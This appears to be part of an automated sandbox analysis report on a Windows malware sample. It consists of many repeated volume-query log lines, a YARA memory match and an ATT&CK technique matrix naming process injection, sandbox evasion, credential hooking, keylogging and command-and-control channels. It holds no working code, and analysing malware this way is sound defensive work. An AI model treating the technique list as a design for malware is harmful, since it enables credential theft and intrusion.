              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: Yara match File source: 0000001D.00000002.2269970604.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: 1 Command and Scripting Interpreter; 2 PowerShell; At; Cron; Launchd; Scheduled Task
              Persistence: 3 Browser Extensions; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection; Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection
              Credential Access: 1 Credential API Hooking; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 21 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: 1 Credential API Hooking; 11 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
